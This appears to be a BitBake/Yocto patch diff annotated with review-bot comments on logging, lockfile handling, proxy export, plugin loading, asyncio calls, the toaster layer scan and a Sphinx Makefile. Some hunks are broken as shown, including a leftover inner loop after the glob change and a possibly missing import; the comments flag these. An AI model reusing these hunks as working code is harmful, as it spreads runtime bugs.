@@ -227,7 +227,9 @@ class TerminalFilter(object):
def keepAlive(self, t):
if not self.cuu:
- print("Bitbake still alive (%ds)" % t)
+ print("Bitbake still alive (no events for %ds). Active tasks:" % t)
+ for t in self.helper.running_tasks:
+ print(t)
sys.stdout.flush()
def updateFooter(self):
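Review bot: The new loop in `keepAlive` reuses `t`, the method's elapsed-seconds parameter, as its loop variable. Nothing after the loop reads it today, but the shadowing is easy to trip over; `for task in self.helper.running_tasks:` followed by `print(task)` reads more clearly. If `running_tasks` is a mapping (not visible here), iterating it prints only the keys, so confirm the output is enough for an operator to identify a hung task.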
@@ -380,14 +382,27 @@ _evt_list = [ "bb.runqueue.runQueueExitWait", "bb.event.LogExecTTY", "logging.Lo
"bb.event.BuildBase", "bb.build.TaskStarted", "bb.build.TaskSucceeded", "bb.build.TaskFailedSilent",
"bb.build.TaskProgress", "bb.event.ProcessStarted", "bb.event.ProcessProgress", "bb.event.ProcessFinished"]
+def drain_events_errorhandling(eventHandler):
+ # We don't have logging setup, we do need to show any events we see before exiting
+ event = True
+ logger = bb.msg.logger_create('bitbake', sys.stdout)
+ while event:
+ event = eventHandler.waitEvent(0)
+ if isinstance(event, logging.LogRecord):
+ logger.handle(event)
+
def main(server, eventHandler, params, tf = TerminalFilter):
- if not params.observe_only:
- params.updateToServer(server, os.environ.copy())
+ try:
+ if not params.observe_only:
+ params.updateToServer(server, os.environ.copy())
- includelogs, loglines, consolelogfile, logconfigfile = _log_settings_from_server(server, params.observe_only)
+ includelogs, loglines, consolelogfile, logconfigfile = _log_settings_from_server(server, params.observe_only)
- loglevel, _ = bb.msg.constructLogOptions()
+ loglevel, _ = bb.msg.constructLogOptions()
+ except bb.BBHandledException:
+ drain_events_errorhandling(eventHandler)
+ return 1
if params.options.quiet == 0:
console_loglevel = loglevel
@@ -584,7 +599,8 @@ def main(server, eventHandler, params, tf = TerminalFilter):
warnings = 0
taskfailures = []
- printinterval = 5000
+ printintervaldelta = 10 * 60 # 10 minutes
+ printinterval = printintervaldelta
lastprint = time.time()
termfilter = tf(main, helper, console_handlers, params.options.quiet)
@@ -594,7 +610,7 @@ def main(server, eventHandler, params, tf = TerminalFilter):
try:
if (lastprint + printinterval) <= time.time():
termfilter.keepAlive(printinterval)
- printinterval += 5000
+ printinterval += printintervaldelta
event = eventHandler.waitEvent(0)
if event is None:
if main.shutdown > 1:
@@ -625,7 +641,7 @@ def main(server, eventHandler, params, tf = TerminalFilter):
if isinstance(event, logging.LogRecord):
lastprint = time.time()
- printinterval = 5000
+ printinterval = printintervaldelta
if event.levelno >= bb.msg.BBLogFormatter.ERROR:
errors = errors + 1
return_value = 1
diff --git a/bitbake/lib/bb/ui/taskexp.py b/bitbake/lib/bb/ui/taskexp.py
index 05e32338c2..c00eaf6638 100644
--- a/bitbake/lib/bb/ui/taskexp.py
+++ b/bitbake/lib/bb/ui/taskexp.py
@@ -8,6 +8,7 @@
#
import sys
+import traceback
try:
import gi
@@ -58,7 +59,12 @@ class PackageReverseDepView(Gtk.TreeView):
self.current = None
self.filter_model = model.filter_new()
self.filter_model.set_visible_func(self._filter)
- self.sort_model = self.filter_model.sort_new_with_model()
+ # The introspected API was fixed but we can't rely on a pygobject that hides this.
+ # https://gitlab.gnome.org/GNOME/pygobject/-/commit/9cdbc56fbac4db2de78dc080934b8f0a7efc892a
+ if hasattr(Gtk.TreeModelSort, "new_with_model"):
+ self.sort_model = Gtk.TreeModelSort.new_with_model(self.filter_model)
+ else:
+ self.sort_model = self.filter_model.sort_new_with_model()
self.sort_model.set_sort_column_id(COL_DEP_PARENT, Gtk.SortType.ASCENDING)
self.set_model(self.sort_model)
self.append_column(Gtk.TreeViewColumn(label, Gtk.CellRendererText(), text=COL_DEP_PARENT))
@@ -191,6 +197,7 @@ def main(server, eventHandler, params):
gtkgui.start()
try:
+ params.updateToServer(server, os.environ.copy())
params.updateFromServer(server)
cmdline = params.parseActions()
if not cmdline:
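Review bot: The added `params.updateToServer(server, os.environ.copy())` uses `os`, but the import hunk for this file shows only `import sys` and the new `import traceback`. If `os` is not imported further down the module, this line raises NameError on every start. Because the call sits inside the `try`, the `except Exception` added in the next hunk would print the traceback and return, so the UI would simply exit at startup. Adding `import os` next to `import traceback` removes the doubt. `main` starts and ends outside this hunk.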
@@ -213,6 +220,9 @@ def main(server, eventHandler, params):
except client.Fault as x:
print("XMLRPC Fault getting commandline:\n %s" % x)
return
+ except Exception as e:
+ print("Exception in startup:\n %s" % traceback.format_exc())
+ return
if gtkthread.quit.isSet():
return
diff --git a/bitbake/lib/bb/utils.py b/bitbake/lib/bb/utils.py
index 5f5767c1da..34fa0b7a67 100644
--- a/bitbake/lib/bb/utils.py
+++ b/bitbake/lib/bb/utils.py
@@ -16,7 +16,8 @@ import bb.msg
import multiprocessing
import fcntl
import importlib
-from importlib import machinery
+import importlib.machinery
+import importlib.util
import itertools
import subprocess
import glob
@@ -420,12 +421,14 @@ def better_eval(source, locals, extraglobals = None):
return eval(source, ctx, locals)
@contextmanager
-def fileslocked(files):
+def fileslocked(files, *args, **kwargs):
"""Context manager for locking and unlocking file locks."""
locks = []
if files:
for lockfile in files:
- locks.append(bb.utils.lockfile(lockfile))
+ l = bb.utils.lockfile(lockfile, *args, **kwargs)
+ if l is not None:
+ locks.append(l)
try:
yield
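Review bot: With the new `if l is not None` filter, `fileslocked` yields even when `bb.utils.lockfile()` returned None for some or all of the files, and the caller cannot tell that the body is running without the lock. That is presumably what a caller passing `block=False` or `retry=False` through `*args, **kwargs` wants, but the docstring should say so, e.g. `"""Context manager for locking and unlocking file locks. Locks that cannot be acquired are skipped; extra arguments are passed to lockfile()."""`. The name `l` is also easy to misread as `1`; `lock` would be clearer. The function continues past the end of the hunk.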
@@ -458,9 +461,16 @@ def lockfile(name, shared=False, retry=True, block=False):
consider the possibility of sending a signal to the process to break
out - at which point you want block=True rather than retry=True.
"""
+ basename = os.path.basename(name)
+ if len(basename) > 255:
+ root, ext = os.path.splitext(basename)
+ basename = root[:255 - len(ext)] + ext
+
dirname = os.path.dirname(name)
mkdirhier(dirname)
+ name = os.path.join(dirname, basename)
+
if not os.access(dirname, os.W_OK):
logger.error("Unable to acquire lock '%s', directory is not writable",
name)
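Review bot: Truncating `basename` to 255 means two different long lock names that share their leading characters and extension now map to the same lock file, so unrelated work serialises on one lock and a process that takes both could block on itself. The limit is applied to characters, while the filesystem limit is normally counted in bytes, so a non-ASCII name can still fail with ENAMETOOLONG. If `ext` is itself longer than 255, the slice `root[:255 - len(ext)]` goes negative. A comment stating that collisions are accepted, or a short digest of the original name inside the truncated one, would make the intent explicit. The function starts and ends outside this hunk.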
@@ -494,7 +504,7 @@ def lockfile(name, shared=False, retry=True, block=False):
return lf
lf.close()
except OSError as e:
- if e.errno == errno.EACCES:
+ if e.errno == errno.EACCES or e.errno == errno.ENAMETOOLONG:
logger.error("Unable to acquire lock '%s', %s",
e.strerror, name)
sys.exit(1)
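Review bot: The `logger.error` call under the extended condition passes its arguments in the opposite order to the format string: the quoted `'%s'` meant for the lock name receives `e.strerror`, and the trailing `%s` receives `name`. Since this hunk adds a second errno that reaches the message, it is a good moment to swap them: `logger.error("Unable to acquire lock '%s', %s", name, e.strerror)`. The condition itself reads more simply as `if e.errno in (errno.EACCES, errno.ENAMETOOLONG):`.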
@@ -959,6 +969,17 @@ def which(path, item, direction = 0, history = False, executable=False):
return "", hist
return ""
+@contextmanager
+def umask(new_mask):
+ """
+ Context manager to set the umask to a specific mask, and restore it afterwards.
+ """
+ current_mask = os.umask(new_mask)
+ try:
+ yield
+ finally:
+ os.umask(current_mask)
+
def to_boolean(string, default=None):
if not string:
return default
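Review bot: The docstring of the new `umask()` context manager should say that `os.umask` changes the mask for the whole process, not only for the calling thread. Files created by other threads while the `with` block is active therefore also get `new_mask`. One added sentence is enough: `Note: the umask is process-wide; other threads creating files inside the block are affected too.` The restore in `finally` is correct.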
@@ -1560,21 +1581,22 @@ def set_process_name(name):
# export common proxies variables from datastore to environment
def export_proxies(d):
- import os
+ """ export common proxies variables from datastore to environment """
variables = ['http_proxy', 'HTTP_PROXY', 'https_proxy', 'HTTPS_PROXY',
'ftp_proxy', 'FTP_PROXY', 'no_proxy', 'NO_PROXY',
- 'GIT_PROXY_COMMAND']
+ 'GIT_PROXY_COMMAND', 'SSL_CERT_FILE', 'SSL_CERT_DIR']
exported = False
- for v in variables:
- if v in os.environ.keys():
+ origenv = d.getVar("BB_ORIGENV")
+
+ for name in variables:
+ value = d.getVar(name)
+ if not value and origenv:
+ value = origenv.getVar(name)
+ if value:
+ os.environ[name] = value
exported = True
- else:
- v_proxy = d.getVar(v)
- if v_proxy is not None:
- os.environ[v] = v_proxy
- exported = True
return exported
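Review bot: The rewritten loop reverses the precedence: a value from the datastore (or `BB_ORIGENV`) now overwrites whatever is already in `os.environ`, where the old code left an existing environment value alone. With `SSL_CERT_FILE` and `SSL_CERT_DIR` added to the list, configuration metadata now decides which CA bundle later TLS clients in this process trust. The docstring should state that order, e.g. `Datastore values take precedence over the current environment; BB_ORIGENV is used as a fallback.` The old `#` comment above the `def` now duplicates the docstring and can be dropped.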
@@ -1584,7 +1606,9 @@ def load_plugins(logger, plugins, pluginpath):
logger.debug(1, 'Loading plugin %s' % name)
spec = importlib.machinery.PathFinder.find_spec(name, path=[pluginpath] )
if spec:
- return spec.loader.load_module()
+ mod = importlib.util.module_from_spec(spec)
+ spec.loader.exec_module(mod)
+ return mod
logger.debug(1, 'Loading plugins from %s...' % pluginpath)
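Review bot: `spec.loader.load_module()` registered the plugin in `sys.modules`, but the replacement `module_from_spec()` plus `exec_module()` does not. Code that later looks the plugin up by module name, or imports it again, would therefore get a miss or a second copy. The usual importlib recipe inserts the module before executing it, i.e. `sys.modules[name] = mod` between the two added lines. If leaving plugins unregistered is deliberate (for example to avoid name clashes between plugin directories), a one-line comment saying so would help. The enclosing function starts outside the hunk.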
diff --git a/bitbake/lib/bblayers/action.py b/bitbake/lib/bblayers/action.py
index d6459d6617..d2f9c1bbde 100644
--- a/bitbake/lib/bblayers/action.py
+++ b/bitbake/lib/bblayers/action.py
@@ -50,10 +50,10 @@ class ActionPlugin(LayerPlugin):
if not (args.force or notadded):
try:
self.tinfoil.run_command('parseConfiguration')
- except bb.tinfoil.TinfoilUIException:
+ except (bb.tinfoil.TinfoilUIException, bb.BBHandledException):
# Restore the back up copy of bblayers.conf
shutil.copy2(backup, bblayers_conf)
- bb.fatal("Parse failure with the specified layer added")
+ bb.fatal("Parse failure with the specified layer added, aborting.")
else:
for item in notadded:
sys.stderr.write("Specified layer %s is already in BBLAYERS\n" % item)
diff --git a/bitbake/lib/bblayers/layerindex.py b/bitbake/lib/bblayers/layerindex.py
index 95b67a6621..f64d18e819 100644
--- a/bitbake/lib/bblayers/layerindex.py
+++ b/bitbake/lib/bblayers/layerindex.py
@@ -206,6 +206,7 @@ class LayerIndexPlugin(ActionPlugin):
"""
args.show_only = True
args.ignore = []
+ args.shallow = True
self.do_layerindex_fetch(args)
def register_commands(self, sp):
diff --git a/bitbake/lib/bblayers/query.py b/bitbake/lib/bblayers/query.py
index e2cc310532..652a3acce0 100644
--- a/bitbake/lib/bblayers/query.py
+++ b/bitbake/lib/bblayers/query.py
@@ -150,7 +150,7 @@ skipped recipes will also be listed, with a " (skipped)" suffix.
def print_item(f, pn, ver, layer, ispref):
if not selected_layer or layer == selected_layer:
if not bare and f in skiplist:
- skipped = ' (skipped)'
+ skipped = ' (skipped: %s)' % self.tinfoil.cooker.skiplist[f].skipreason
else:
skipped = ''
if show_filenames:
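Review bot: The condition tests `f in skiplist` but the reason is read from `self.tinfoil.cooker.skiplist[f]`. If the local `skiplist`, built outside this hunk, is ever derived from a different source, the lookup raises KeyError in the middle of the listing. Reading both from the same object, or using `.get(f)` with a fallback to the plain `' (skipped)'` suffix, keeps the output robust.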
@@ -433,10 +433,10 @@ NOTE: .bbappend files can impact the dependencies.
line = fnfile.readline()
# The "require/include xxx" in conf/machine/*.conf, .inc and .bbclass
- conf_re = re.compile(".*/conf/machine/[^\/]*\.conf$")
- inc_re = re.compile(".*\.inc$")
+ conf_re = re.compile(r".*/conf/machine/[^\/]*\.conf$")
+ inc_re = re.compile(r".*\.inc$")
# The "inherit xxx" in .bbclass
- bbclass_re = re.compile(".*\.bbclass$")
+ bbclass_re = re.compile(r".*\.bbclass$")
for layerdir in self.bblayers:
layername = self.get_layer_name(layerdir)
for dirpath, dirnames, filenames in os.walk(layerdir):
diff --git a/bitbake/lib/hashserv/server.py b/bitbake/lib/hashserv/server.py
index 81050715ea..f38a22ad92 100644
--- a/bitbake/lib/hashserv/server.py
+++ b/bitbake/lib/hashserv/server.py
@@ -12,6 +12,7 @@ import math
import os
import signal
import socket
+import sys
import time
from . import chunkify, DEFAULT_MAX_CHUNK
@@ -419,9 +420,14 @@ class Server(object):
self._cleanup_socket = None
def start_tcp_server(self, host, port):
- self.server = self.loop.run_until_complete(
- asyncio.start_server(self.handle_client, host, port, loop=self.loop)
- )
+ if sys.version_info[0] == 3 and sys.version_info[1] < 6:
+ self.server = self.loop.run_until_complete(
+ asyncio.start_server(self.handle_client, host, port, loop=self.loop)
+ )
+ else:
+ self.server = self.loop.run_until_complete(
+ asyncio.start_server(self.handle_client, host, port)
+ )
for s in self.server.sockets:
logger.info('Listening on %r' % (s.getsockname(),))
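Review bot: The version test and the two near-identical `run_until_complete` calls are duplicated here and again in the unix-socket hunk that follows. Comparing tuples and building the optional argument once is shorter and keeps the two paths from drifting: `kwargs = {'loop': self.loop} if sys.version_info < (3, 6) else {}` and then `asyncio.start_server(self.handle_client, host, port, **kwargs)`. A one-line comment saying why `loop=` is omitted on newer interpreters would also help the next reader.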
@@ -444,9 +450,14 @@ class Server(object):
try:
# Work around path length limits in AF_UNIX
os.chdir(os.path.dirname(path))
- self.server = self.loop.run_until_complete(
- asyncio.start_unix_server(self.handle_client, os.path.basename(path), loop=self.loop)
- )
+ if sys.version_info[0] == 3 and sys.version_info[1] < 6:
+ self.server = self.loop.run_until_complete(
+ asyncio.start_unix_server(self.handle_client, os.path.basename(path), loop=self.loop)
+ )
+ else:
+ self.server = self.loop.run_until_complete(
+ asyncio.start_unix_server(self.handle_client, os.path.basename(path))
+ )
finally:
os.chdir(cwd)
diff --git a/bitbake/lib/layerindexlib/__init__.py b/bitbake/lib/layerindexlib/__init__.py
index 77196b408f..f30ee9e259 100644
--- a/bitbake/lib/layerindexlib/__init__.py
+++ b/bitbake/lib/layerindexlib/__init__.py
@@ -6,7 +6,6 @@
import datetime
import logging
-import imp
from collections import OrderedDict
from layerindexlib.plugin import LayerIndexPluginUrlError
diff --git a/bitbake/lib/toaster/toastergui/api.py b/bitbake/lib/toaster/toastergui/api.py
index b4cdc335ef..e367bd910e 100644
--- a/bitbake/lib/toaster/toastergui/api.py
+++ b/bitbake/lib/toaster/toastergui/api.py
@@ -11,7 +11,7 @@ import os
import re
import logging
import json
-import subprocess
+import glob
from collections import Counter
from orm.models import Project, ProjectTarget, Build, Layer_Version
@@ -227,20 +227,18 @@ class XhrSetDefaultImageUrl(View):
# same logical name
# * Each project that uses a layer will have its own
# LayerVersion and Project Layer for it
-# * During the Paroject delete process, when the last
+# * During the Project delete process, when the last
# LayerVersion for a 'local_source_dir' layer is deleted
# then the Layer record is deleted to remove orphans
#
def scan_layer_content(layer,layer_version):
# if this is a local layer directory, we can immediately scan its content
- if layer.local_source_dir:
+ if os.path.isdir(layer.local_source_dir):
try:
# recipes-*/*/*.bb
- cmd = '%s %s' % ('ls', os.path.join(layer.local_source_dir,'recipes-*/*/*.bb'))
- recipes_list = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,stderr=subprocess.STDOUT).stdout.read()
- recipes_list = recipes_list.decode("utf-8").strip()
- if recipes_list and 'No such' not in recipes_list:
+ recipes_list = glob.glob(os.path.join(layer.local_source_dir, 'recipes-*/*/*.bb'))
+ for recipe in recipes_list:
for recipe in recipes_list.split('\n'):
recipe_path = recipe[recipe.rfind('recipes-'):]
recipe_name = recipe[recipe.rfind('/')+1:].replace('.bb','')
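Review bot: The added `for recipe in recipes_list:` is followed by the old inner loop `for recipe in recipes_list.split('\n'):`, still present as a context line; `glob.glob()` returns a list, so `.split` raises AttributeError on the first iteration. As far as the next hunk shows, the surrounding `except Exception` only logs a warning, so the scan would silently record nothing. Remove the inner `for` line and dedent its body one level. Separately, `os.path.isdir(layer.local_source_dir)` raises TypeError when the field is None, which the previous truthiness test tolerated; `if layer.local_source_dir and os.path.isdir(layer.local_source_dir):` keeps both checks. The function body continues outside the hunk.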
@@ -260,6 +258,9 @@ def scan_layer_content(layer,layer_version):
except Exception as e:
logger.warning("ERROR:scan_layer_content: %s" % e)
+ else:
+ logger.warning("ERROR: wrong path given")
+ raise KeyError("local_source_dir")
class XhrLayer(View):
""" Delete, Get, Add and Update Layer information
@@ -456,15 +457,18 @@ class XhrLayer(View):
'layerdetailurl':
layer_dep.get_detailspage_url(project.pk)})
- # Scan the layer's content and update components
- scan_layer_content(layer,layer_version)
+ # Only scan_layer_content if layer is local
+ if layer_data.get('local_source_dir', None):
+ # Scan the layer's content and update components
+ scan_layer_content(layer,layer_version)
except Layer_Version.DoesNotExist:
return error_response("layer-dep-not-found")
except Project.DoesNotExist:
return error_response("project-not-found")
- except KeyError:
- return error_response("incorrect-parameters")
+ except KeyError as e:
+ _log("KeyError: %s" % e)
+ return error_response(f"incorrect-parameters")
return JsonResponse({'error': "ok",
'imported_layer': {
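Review bot: `error_response(f"incorrect-parameters")` carries an `f` prefix with no placeholders; the plain string `"incorrect-parameters"` is what was meant. The new guard tests `layer_data.get('local_source_dir', None)` from the request, while `scan_layer_content()` checks `layer.local_source_dir`. Using the same value in both places would make it obvious that the two cannot disagree.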
diff --git a/documentation/.gitignore b/documentation/.gitignore
new file mode 100644
index 0000000000..21bb72530a
--- /dev/null
+++ b/documentation/.gitignore
@@ -0,0 +1,2 @@
+_build/
+Pipfile.lock
diff --git a/documentation/Makefile b/documentation/Makefile
index 15644bf926..d40f390e2b 100644
--- a/documentation/Makefile
+++ b/documentation/Makefile
@@ -1,431 +1,35 @@
-# This is a single Makefile to handle all generated Yocto Project documents,
-# which includes the BitBake User Manual and the Toaster User Manual.
-# The Makefile needs to live in the documents directory and all figures used
-# in any manuals must be .PNG files and live in the individual book's figures
-# directory as well as in the figures directory for the mega-manual.
+# Minimal makefile for Sphinx documentation
#
-# Note that the figures for the Yocto Project Development Tasks Manual
-# differ depending on the BRANCH being built.
-#
-# The Makefile has these targets:
-# all: If you leave off the target then "all" is implied.
-# You will generate HTML and a tarball of files.
-#
-# pdf: generates a PDF version of a manual. Not valid for the
-# Quick Start or the mega-manual (single, large HTML file
-# comprised of all Yocto Project manuals).
-# html: generates an HTML version of a manual.
-# tarball: creates a tarball for the doc files.
-# validate: validates
-# publish: pushes generated files to the Yocto Project website
-# clean: removes files
-#
-# The Makefile can generate an HTML and PDF version of every document except the
-# Yocto Project Quick Start and the single, HTML mega-manual, which is comprised
-# of all the individual Yocto Project manuals. You can generate these two manuals
-# in HTML form only. The variable DOC indicates the folder name for a given manual.
-# The variable VER represents the distro version of the Yocto Release for which the
-# manuals are being generated. The variable BRANCH is used to indicate the
-# branch (edison or denzil) and is used only when DOC=dev-manual or
-# DOC=mega-manual. If you do not specify a BRANCH, the default branch used
-# will be for the latest Yocto Project release. If you build for either
-# edison or denzil, you must use BRANCH. You do not need to use BRANCH for
-# any release beyond denzil.
-#
-# To build a manual, you must invoke Makefile with the DOC argument. If you
-# are going to publish the manual, then you must invoke Makefile with both the
-# DOC and the VER argument. Furthermore, if you are building or publishing
-# the edison or denzil versions of the Yocto Project Development Tasks Manual or
-# the mega-manual, you must also use the BRANCH argument.
-#
-# Examples:
-#
-# make DOC=bsp-guide
-# make html DOC=brief-yoctoprojectqs
-# make pdf DOC=ref-manual
-# make DOC=dev-manual BRANCH=edison
-# make DOC=mega-manual BRANCH=denzil
-#
-# The first example generates the HTML version of the BSP Guide.
-# The second example generates the HTML version only of the Quick Start. Note
-# that the Quick Start only has an HTML version available. So, the
-# 'make DOC=brief-yoctoprojectqs' command would be equivalent. The third example
-# generates just the PDF version of the Yocto Project Reference Manual.
-# The fourth example generates the HTML 'edison' version of the YP Development
-# Tasks Manual. The last example
-# generates the HTML version of the mega-manual and uses the 'denzil'
-# branch when choosing figures for the tarball of figures. Any example that does
-# not use the BRANCH argument builds the current version of the manual set.
-#
-# The publish target pushes the generated manuals to the Yocto Project
-# website. Unless you are a developer on the YP team, you will not succeed in
-# pushing manuals to this server. All files needed for the manual's HTML form are
-# pushed.
-#
-# Examples:
-#
-# make publish DOC=bsp-guide VER=1.7
-# make publish DOC=adt-manual VER=1.6
-# make publish DOC=dev-manual VER=1.1.1 BRANCH=edison
-# make publish DOC=dev-manual VER=1.2 BRANCH=denzil
-#
-# The first example publishes the 1.7 version of both the PDF and HTML versions of
-# the BSP Guide. The second example publishes the 1.6 version of both the PDF and
-# HTML versions of the ADT Manual. The third example publishes the 1.1.1 version of
-# the PDF and HTML YP Development Tasks Manual for the 'edison' branch. The fourth
-# example publishes the 1.2 version of the PDF and HTML YP Development Tasks Manual
-# for the 'denzil' branch.
-#
-# IN MEMORIAM: This comment is to remember Scott Rifenbark (scottrif), whom we lost
-# in January, 2020. Scott was the primary technical writer for the Yocto Project for
-# over 9 years. In that time, he contributed many thousands of patches, built this
-# documentation tree, and enabled tens of thousands of developers to succeed with
-# embedded Linux. He ran this Makefile many thousands of times. Godspeed, Dude.
-ifeq ($(DOC),brief-yoctoprojectqs)
-XSLTOPTS = --stringparam html.stylesheet brief-yoctoprojectqs-style.css \
- --stringparam chapter.autolabel 0 \
- --stringparam section.autolabel 0 \
- --stringparam section.label.includes.component.label 0 \
- --xinclude
-ALLPREQ = html tarball
-TARFILES = brief-yoctoprojectqs-style.css brief-yoctoprojectqs.html figures/bypqs-title.png \
- figures/yocto-project-transp.png
-MANUALS = $(DOC)/$(DOC).html
-FIGURES = figures
-STYLESHEET = $(DOC)/*.css
+# You can set these variables from the command line, and also
+# from the environment for the first two.
+SPHINXOPTS ?= -j auto
+SPHINXBUILD ?= sphinx-build
+SOURCEDIR = .
+BUILDDIR = _build
+DESTDIR = final
+ifeq ($(shell if which $(SPHINXBUILD) >/dev/null 2>&1; then echo 1; else echo 0; fi),0)
+$(error "The '$(SPHINXBUILD)' command was not found. Make sure you have Sphinx installed")
endif
-ifeq ($(DOC),overview-manual)
-XSLTOPTS = --xinclude
-ALLPREQ = html tarball
-TARFILES = overview-manual-style.css overview-manual.html figures/overview-manual-title.png \
- figures/git-workflow.png figures/source-repos.png figures/index-downloads.png \
- figures/yp-download.png figures/YP-flow-diagram.png figures/key-dev-elements.png \
- figures/poky-reference-distribution.png figures/cross-development-toolchains.png \
- figures/user-configuration.png figures/layer-input.png figures/source-input.png \
- figures/package-feeds.png figures/patching.png figures/source-fetching.png \
- figures/configuration-compile-autoreconf.png figures/analysis-for-package-splitting.png \
- figures/image-generation.png figures/sdk-generation.png figures/images.png \
- figures/sdk.png
-MANUALS = $(DOC)/$(DOC).html
-FIGURES = figures
-STYLESHEET = $(DOC)/*.css
-
-endif
+# Put it first so that "make" without argument is like "make help".
+help:
+ @$(SPHINXBUILD) -M help "$(SOURCEDIR)" "$(BUILDDIR)" $(SPHINXOPTS) $(O)
-ifeq ($(DOC),bsp-guide)
-XSLTOPTS = --xinclude
-ALLPREQ = html tarball
-TARFILES = bsp-style.css bsp-guide.html figures/bsp-title.png \
- figures/bsp-dev-flow.png
-MANUALS = $(DOC)/$(DOC).html
-FIGURES = figures
-STYLESHEET = $(DOC)/*.css
+.PHONY: help Makefile clean publish
-endif
-
-ifeq ($(DOC),dev-manual)
-XSLTOPTS = --xinclude
-ALLPREQ = html tarball
-#
-# Note that the tarfile might produce the "Cannot stat: No such file or
-# directory" error message for .PNG files that are not present when building
-# a particular branch. The list of files is all-inclusive for all branches.
-# Note, if you don't provide a BRANCH option, it defaults to the latest stuff.
-# This would be appropriate for "master" branch.
-#
-
- ifeq ($(BRANCH),edison)
-TARFILES = dev-style.css dev-manual.html \
- figures/app-dev-flow.png figures/bsp-dev-flow.png \
- figures/dev-title.png figures/git-workflow.png \
- figures/index-downloads.png figures/kernel-dev-flow.png \
- figures/kernel-example-repos-edison.png \
- figures/kernel-overview-1.png figures/kernel-overview-2.png \
- figures/kernel-overview-3-edison.png \
- figures/source-repos.png figures/yp-download.png \
- figures/wip.png
- else ifeq ($(BRANCH),denzil)
-TARFILES = dev-style.css dev-manual.html \
- figures/app-dev-flow.png figures/bsp-dev-flow.png \
- figures/dev-title.png figures/git-workflow.png \
- figures/index-downloads.png figures/kernel-dev-flow.png \
- figures/kernel-example-repos-denzil.png \
- figures/kernel-overview-1.png figures/kernel-overview-2.png \
- figures/kernel-overview-3-denzil.png \
- figures/source-repos.png figures/yp-download.png \
- figures/wip.png
- else
-TARFILES = dev-style.css dev-manual.html figures/buildhistory-web.png \
- figures/dev-title.png figures/buildhistory.png \
- figures/recipe-workflow.png figures/bitbake-build-flow.png \
- figures/multiconfig_files.png figures/cute-files-npm-example.png
- endif
-
-MANUALS = $(DOC)/$(DOC).html
-FIGURES = figures
-STYLESHEET = $(DOC)/*.css
-
-endif
-
-ifeq ($(DOC),mega-manual)
-XSLTOPTS = --stringparam html.stylesheet mega-style.css \
- --stringparam chapter.autolabel 1 \
- --stringparam section.autolabel 1 \
- --stringparam section.label.includes.component.label 1 \
- --xinclude
-ALLPREQ = html tarball
-
- ifeq ($(BRANCH),edison)
-TARFILES = mega-manual.html mega-style.css figures/yocto-environment.png \
- figures/building-an-image.png \
- figures/using-a-pre-built-image.png \
- figures/poky-title.png \
- figures/adt-title.png figures/bsp-title.png \
- figures/kernel-title.png figures/kernel-architecture-overview.png \
- figures/app-dev-flow.png figures/bsp-dev-flow.png \
- figures/dev-title.png figures/git-workflow.png \
- figures/index-downloads.png figures/kernel-dev-flow.png \
- figures/kernel-example-repos-edison.png \
- figures/kernel-overview-1.png figures/kernel-overview-2.png \
- figures/kernel-overview-3-edison.png \
- figures/source-repos.png figures/yp-download.png \
- figures/wip.png
- else ifeq ($(BRANCH),denzil)
-TARFILES = mega-manual.html mega-style.css figures/yocto-environment.png \
- figures/building-an-image.png \
- figures/using-a-pre-built-image.png \
- figures/poky-title.png \
- figures/adt-title.png figures/bsp-title.png \
- figures/kernel-title.png figures/kernel-architecture-overview.png \
- figures/app-dev-flow.png figures/bsp-dev-flow.png \
- figures/dev-title.png figures/git-workflow.png \
- figures/index-downloads.png figures/kernel-dev-flow.png \
- figures/kernel-example-repos-denzil.png \
- figures/kernel-overview-1.png figures/kernel-overview-2.png \
- figures/kernel-overview-3-denzil.png \
- figures/source-repos.png figures/yp-download.png \
- figures/wip.png
- else
-TARFILES = mega-manual.html mega-style.css \
- figures/YP-flow-diagram.png \
- figures/using-a-pre-built-image.png \
- figures/poky-title.png figures/buildhistory.png \
- figures/buildhistory-web.png \
- figures/sdk-title.png figures/bsp-title.png \
- figures/kernel-dev-title.png figures/kernel-architecture-overview.png \
- figures/bsp-dev-flow.png \
- figures/dev-title.png \
- figures/git-workflow.png figures/index-downloads.png \
- figures/kernel-dev-flow.png \
- figures/kernel-overview-2-generic.png \
- figures/source-repos.png figures/yp-download.png \
- figures/profile-title.png figures/kernelshark-all.png \
- figures/kernelshark-choose-events.png \
- figures/kernelshark-i915-display.png \
- figures/kernelshark-output-display.png \
- figures/oprofileui-busybox.png figures/oprofileui-copy-to-user.png \
- figures/oprofileui-downloading.png figures/oprofileui-processes.png \
- figures/perf-probe-do_fork-profile.png \
- figures/perf-report-cycles-u.png \
- figures/perf-systemwide.png figures/perf-systemwide-libc.png \
- figures/perf-wget-busybox-annotate-menu.png \
- figures/perf-wget-busybox-annotate-udhcpc.png \
- figures/perf-wget-busybox-debuginfo.png \
- figures/perf-wget-busybox-dso-zoom.png \
- figures/perf-wget-busybox-dso-zoom-menu.png \
- figures/perf-wget-busybox-expanded-stripped.png \
- figures/perf-wget-flat-stripped.png \
- figures/perf-wget-g-copy-from-user-expanded-stripped.png \
- figures/perf-wget-g-copy-to-user-expanded-debuginfo.png \
- figures/perf-wget-g-copy-to-user-expanded-stripped.png \
- figures/perf-wget-g-copy-to-user-expanded-stripped-unresolved-hidden.png \
- figures/pybootchartgui-linux-yocto.png \
- figures/pychart-linux-yocto-rpm.png \
- figures/pychart-linux-yocto-rpm-nostrip.png \
- figures/sched-wakeup-profile.png figures/sysprof-callers.png \
- figures/sysprof-copy-from-user.png figures/sysprof-copy-to-user.png \
- figures/cross-development-toolchains.png \
- figures/user-configuration.png \
- figures/source-input.png figures/package-feeds.png \
- figures/layer-input.png figures/images.png figures/sdk.png \
- figures/source-fetching.png figures/patching.png \
- figures/configuration-compile-autoreconf.png \
- figures/analysis-for-package-splitting.png \
- figures/image-generation.png figures/key-dev-elements.png\
- figures/sdk-generation.png figures/recipe-workflow.png \
- figures/build-workspace-directory.png figures/mega-title.png \
- figures/toaster-title.png figures/hosted-service.png figures/multiconfig_files.png \
- figures/simple-configuration.png figures/poky-reference-distribution.png \
- figures/compatible-layers.png figures/import-layer.png figures/new-project.png \
- figures/sdk-environment.png figures/sdk-installed-standard-sdk-directory.png \
- figures/sdk-devtool-add-flow.png figures/sdk-installed-extensible-sdk-directory.png \
- figures/sdk-devtool-modify-flow.png \
- figures/sdk-devtool-upgrade-flow.png figures/bitbake-build-flow.png figures/bypqs-title.png \
- figures/overview-manual-title.png figures/sdk-autotools-flow.png figures/sdk-makefile-flow.png \
- figures/bb_multiconfig_files.png figures/bitbake-title.png figures/cute-files-npm-example.png
- endif
-
-MANUALS = $(DOC)/$(DOC).html
